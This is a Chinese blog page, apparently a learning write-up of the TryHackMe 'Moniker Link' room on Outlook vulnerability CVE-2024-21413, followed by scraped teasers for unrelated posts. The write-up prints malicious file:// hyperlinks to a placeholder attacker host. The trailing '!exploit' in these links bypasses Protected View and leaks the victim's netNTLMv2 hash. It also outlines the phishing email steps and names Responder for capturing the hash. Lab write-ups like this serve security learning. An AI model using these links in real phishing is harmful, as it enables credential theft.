news 2026/9/3 1:52:01

深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

Tryhackme — Moniker Link (CVE-2024–21413)

任务 1 — 简介
2024年2月13日,微软公布了一个Microsoft Outlook远程代码执行(RCE)及凭证泄露漏洞,分配的CVE编号为CVE-2024–21413(Moniker Link)。Check Point Research的Haifei Li被确认发现了此漏洞。

该漏洞在处理一种称为“Moniker Link”的特殊超链接时,绕过了Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦受害者点击该超链接,就会导致Outlook将用户的NTLM凭证发送给攻击者。

回答以下问题:
该CVE被分配的“严重性”等级是什么?
= 严重

任务 2 — Moniker Link (CVE-2024–21413)
通过在超链接中使用file://类型的Moniker Link,我们可以指示Outlook尝试访问一个文件,例如网络共享上的文件(<a href="file://ATTACKER_IP/test">Click me</a>)。此过程使用SMB协议,该协议会使用本地凭证进行身份验证。然而,Outlook的“受保护的视图”功能会捕获并阻止此尝试。

<p><a href="file://ATTACKER_MACHINE/test">Click me</a></p>

此处的漏洞在于,修改我们的超链接,在Moniker Link中包含!特殊字符和一些文本,从而绕过Outlook的“受保护的视图”。例如:
<a href="file://ATTACKER_IP/test!exploit">Click me</a>.

<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

作为攻击者,我们可以提供这种性质的Moniker Link进行攻击。请注意,远程设备上并不需要实际存在该共享,因为无论如何都会尝试进行身份验证,从而导致受害者的Windows netNTLMv2哈希值被发送给攻击者。

远程代码执行是可能的,因为Moniker Link在Windows上使用了组件对象模型。不过,对此进行解释目前超出了本房间的范围,因为尚未有公开发布的通过此特定CVE实现RCE的概念验证。

回答以下问题:
我们在超链接中使用哪种Moniker Link类型?
= file://
用于绕过Outlook“受保护的视图”的特殊字符是什么?
= !

任务 3 — 利用
数据: https://tryhackme.com/room/monikerlink

概念验证:

  • 需要攻击者和受害者的电子邮件。通常,你需要使用自己的SMTP服务器(本房间已为你提供)。
  • 需要密码进行身份验证。在本房间中,attacker@monikerlink.thm的密码是attacker
  • 包含电子邮件内容 (html_content),其中包含我们作为HTML超链接的Moniker Link。
  • 然后,填写电子邮件中的“主题”、“发件人”和“收件人”字段。
  • 最后,将电子邮件发送到邮件服务器。

我们在AttackBox上用来捕获用户哈希的应用程序名称是什么?
= responder
点击电子邮件中的超链接后捕获的哈希类型是什么?
= netNTLMv2

其他任务涉及新的Outlook更新,如果不看答案,你可能无法完成房间,因此答案已在任务本身中给出。

这是我的学习总结,希望对你有帮助,别忘了关注。FINISHED
CSD0tFqvECLokhw9aBeRqm5orB3AsHVzWqw5nASLxH9NbQfXT2bQPYZThKYCe4Jv48TgTN9cT+sa7UDoads3y/guN6+Q4S1LWPV/MKeUL/p6w4ps0bEExAdq59YOidx2
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/9/2 8:56:05

【Django毕设全套源码+文档】基于django的共享咖啡机运维故障报修系统的设计与实现(丰富项目+远程调试+讲解+定制)

博主介绍&#xff1a;✌️码农一枚 &#xff0c;专注于大学生项目实战开发、讲解和毕业&#x1f6a2;文撰写修改等。全栈领域优质创作者&#xff0c;博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围&#xff1a;&am…

作者头像 李华
网站建设 2026/9/2 21:30:01

赶deadline必备 AI论文工具 千笔AI VS speedai,本科生写作神器!

随着人工智能技术的迅猛迭代与普及&#xff0c;AI辅助写作工具已逐步渗透到高校学术写作场景中&#xff0c;成为本科生、研究生完成毕业论文不可或缺的辅助手段。越来越多面临毕业论文压力的学生&#xff0c;开始依赖各类AI工具简化写作流程、提升创作效率。但与此同时&#xf…

作者头像 李华
网站建设 2026/9/2 20:36:42

OpenClaw从本地运行时到云端推理的完全接管机制与安全边界

1. 绪论&#xff1a;代理化AI的兴起与“计算机使用”范式的转变 在人工智能的发展历程中&#xff0c;大语言模型&#xff08;LLM&#xff09;的出现最初被视为一种文本生成与处理的革命。然而&#xff0c;随着2025年至2026年间技术的迅猛迭代&#xff0c;AI的焦点已从单纯的“…

作者头像 李华
网站建设 2026/9/2 21:21:11

便携式头盔外观造型设计

便携式头盔外观造型设计 第一章 设计定位与核心需求分析 便携式头盔外观造型设计以“轻量化、可折叠、安全可靠、美学适配”为核心定位&#xff0c;面向电动自行车骑行、轮滑运动、户外探险等场景&#xff0c;解决传统头盔体积大、携带不便的痛点。核心需求聚焦三大维度&#x…

作者头像 李华
网站建设 2026/9/2 16:25:03

springbootvue基于Flask的河北省青少年科技竞赛网站设计与实现3.5

目录 项目背景技术架构功能模块创新点应用价值 项目技术支持可定制开发之功能亮点源码获取详细视频演示 &#xff1a;文章底部获取博主联系方式&#xff01;同行可合作 项目背景 河北省青少年科技竞赛网站基于SpringBootVue和Flask技术栈开发&#xff0c;旨在为青少年科技活动…

作者头像 李华